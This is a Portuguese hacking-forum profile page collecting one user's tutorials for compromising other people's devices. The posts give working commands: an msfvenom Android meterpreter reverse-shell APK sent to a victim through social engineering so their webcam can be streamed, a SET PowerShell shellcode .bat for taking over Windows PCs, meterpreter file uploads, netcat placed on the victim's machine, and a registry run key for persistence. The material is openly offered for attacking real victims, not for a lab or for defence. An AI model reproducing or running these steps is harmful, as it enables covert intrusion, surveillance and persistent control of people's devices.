Welcome to Shadow Network

Seja bem-vindo ao nosso fórum, registre-se para poder interagir em nosso fórum

tomz

Members
  • Total de itens

    12
  • Registro em

  • Última visita

Reputação

22 Excellent

1 Seguidor

Sobre tomz

  • Rank
    Newbie

Últimos Visitantes

34 visualizações
  1. Pode ser que a versão do Android não seja compatível com o aplicativo criado pelo msfvenom, meu android do celular 4.2.2 não funcionou também!
  2. [TOOL]

    Esse sistema de stress também usará minha taxa de upload, certo ?
  3. Provavelmente sim. Se você quiser setar o payload no msfconsole a hora que quiser e dar certo, você tem que executar os comandos no meterpreter antes da vitima ligar o computador, mas caso quiser mesmo isso, você fará assim: Upe o netcat no computador da vitima, e crie um arquivo .bat para iniciar esse netcat (comando: Start C.\Local_Do_Arquivo\Nome_Do_Arquivo), coloca ele numa pasta, tipo a system32, upa o .bat e o arquivo com os comandos lá de cima. Agora é só fazer isso com o arquivo que você criou com o SET.
  4. Salve, Vou ensinar como colocar um .exe ou .bat para iniciar com o Windows pelo meterpreter. OBS: VOCÊ JÁ DEVE TER O ARQUIVO DENTRO DO COMPUTADOR DA VITIMA PRA ISSO, COMO UPAR O ARQUIVO EU ENSINEI AQUI Já no computador da vítima, digite o comando: shell Nessa parte, você está dentro do MS-DOS da "Vítima", como eu expliquei antes, você já teria que ter colocado o arquivo no qual quer que inicialize com o Windows dentro do computador da "Vítima". Feito isso você digitará o seguinte comando: reg add HKLM\Software\Microsoft\Windows\CurrentVersion /v NOME_DO_PROCESSO /d C:\CAMINHO_DO_ARQUIVO\NOME_DO_ARQUIVO.EXTENSÃO No meu caso eu coloquei um arquivo .bat para iniciar sempre com o Windows. É isso ai, qualquer duvida pode mandar pm. Tomz
  5. Salve, Vou ensinar como UPAR programas usando o Meterpreter já no computador da Vítima. É uma coisa bem simples, mas requer um pouco de atenção, explicarei. Já no computador da Vítima com o MSFCONSOLE você vai digitar o seguinte comando: upload /root/Desktop/Nome_Do_Arquivo C:\Local_onde_quer_colocar Explicando A primeira parte do comando citado acima (upload /root/Desktop/Nome_Do_Arquivo) irá pegar certo arquivo de certo local do seu Kali, no meu caso foi do Desktop e o arquivo foi um script em perl. A segunda parte do comando (C:\Local_onde_quer_colocar) é o local que você escolhe pra colocar o arquivo, no meu caso eu coloquei em uma pasta no Desktop. LEMBRE-SE: O nome do arquivo depois da barra ( / ) Tem que ser o mesmo para facilitar você a upar, no caso, se um arquivo for .exe (Executável) e mandar pro computador da Vítima como .bat vai danificar o arquivo. É isso aê, podem mandar pm se precisarem de ajuda com algo ! Tomz
  6. [MALWARE]

    @Snizi Isso é preferencial amigo, mas a certeza é que você vai ter que abrir as portas pelo Kali, e o ip que você vai ter que setar no LHOST é o ip do site www.meuip.com, que vai ter que ver dentro do Kali também. Agora... se você prefere colocar o ip ou DNS , é contigo Dá um repzinho se fui útil.
  7. [MALWARE]

    @DayDreamSe você fechar o terminal, basta digitar o comando no msfconsole session -i -1 depois de ter usado o LHOST, LPORT, SET PAYLOAD de novo. @Edit O comando é sessions -i -1 Esqueci do "s"
  8. [MALWARE]

    Salve, Como usar a ferramenta SET (SET TOOL KIT) para invadir Windows. Você ira precisar instalar a ferramenta SET no seu Kali. Abra o terminal, vá até uma pasta de sua preferência para instalar o SET, e digite o seguinte comando: git clone https://github.com/trustedsec/social-engineer-toolkit/ /set Quando terminar, ainda dentro da mesma pasta digite: ./set/setup.py install Após terminar é só dar o comando cd e abrir o SET digitando o comando: setoolkit Agora com o SET aberto Escolha a opção: 1) Social-engineering Attacks Digitando 1 Em seguida escolha a opção: 9) Powershell Attack Vectors Digitando 9 Agora nessa parte você escolherá a opção: 1) Powershell Alphanumeric Shellcode Injector Digitando 1 Aqui ele diz pra você entrar com o seu IP ou DNS pra fazer um host reverso, digite o seu ip Agora entre com a porta para conexão reversa (LEMBRANDO, SE VOCÊ FOR FAZER UMA CONEXÃO EXTERNA, ISTO É, FORA DA SUA REDE, VOCÊ PRECISARÁ ABRIR ESSA PORTA NO SEU MODEM PELO KALI LINUX, SE ABRIR USANDO O WINDOWS NÃO FUNCIONARÁ) Nessa parte ele pergunta se você quer iniciar o "Ouvinte" que irá esperar a conexão reversa. Digite: yes Bom, aqui ele já esta esperando a conexão acontecer, agora vou dizer como vocês vão pegar o arquivo e mandar pra mandar pra pessoa. Abra outro terminal (Ctrl+Shift+n), e Digite o seguinte comando: cd /root/.set/reports/powershell Você vai entrar no diretório onde foi criado o arquivo feito pelo SET Agora digite o comando: cp x86_powershell_injection.txt /root/Desktop/NOME_DO_ARQUIVO.bat Agora que o arquivo está na area de trabalho do seu Kali, você pode mandar pra pessoa, quando ela abrir, aquele outro terminal vai estabelecer a conexão e você já estará dentro do windows da "Vítima". Para saber os comandos digite: ? E lembrando -> Pra você conseguir uma conexão com quem não está na sua rede (wifi por exemplo) você vai ter que: Abrir a porta usada (no meu caso foi a 4444) do seu modem PELO KALI, e criar um dns dinâmico (use o site www.noip.com pra isso). Valeu galera, deixe sua crítica :') Tomz
  9. @Fantashy - @kadojo Obrigado pela critica de vocês !
  10. Salve, Como criar um Trojan para invadir um Android. Abra seu terminal, digite o seguinte comando: msfvenom -p android/meterpreter/reverse_tcp LHOST=SEUIP LPORT=PORTA_USADA_PARA_CONEXÃO R > /root/Desktop/NOMEDOAPK.apk Confira o comando, e execute. Irá criar um arquivo com extensão APK na area de trabalho da sua máquina. ATENÇÃO Antes de mandar isso pra pessoa (Sim, você tem que fazer ela instalar o aplicativo no celular dela para funcionar, lembrando que como é um aplicativo desconhecido, você com sua engenharia social, terá que dizer pra ela liberar a instalação de aplicativo de terceiros: Configurações -> Segurança -> Fontes Desconhecidas "Permitir a instalação de aplicativos de fontes desconhecidas.") Abra um novo terminal (Ctrl+Shift+n) e execute esses comandos: Digite: msfconsole Agora execute esses comandos(um de cada vez): use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost SEU_IP set lport A_PORTA_USADA exploit Ficará mais ou menos assim: Quando o terminal estiver semelhante à screenshot, é porque está esperando a pessoa instalar o aplicativo. Assim que instalar irá estabelecer a conexão. Obs: você deve executar os comandos no MSFCONSOLE antes de mandar a pessoa instalar e abrir. Quando estabelecer a conexão entre você e a "vítima" ficará mais ou menos assim: Nesse caso você já está dentro do Android da pessoa, para saber os comandos digite : ?. ALGUNS COMANDOS webcam_list: lista as webcams que tem. webcam_stream: streama a webcam da pessoa. webcam_snap: tira um print da webcam da pessoa. shell: entra no dos do android ----- LEIA ----- Pra você conseguir uma conexão com quem não está na sua rede (wifi por exemplo) você vai ter que: Abrir a porta usada (no meu caso foi a 4444) do seu modem PELO KALI, e criar um dns dinâmico (use o site www.noip.com pra isso). Valeu galera, deixe sua crítica :') Tomz

Shadow Network

Seja Bem-Vindo ao nosso fórum, construído com o intuito de compartilhar idéias e conhecimentos ao alcance de qualquer pessoa que tenha vontade de aprender.

Atencao

Em caso de bugs/erros no forum, entre em contato com algum membro da equipe.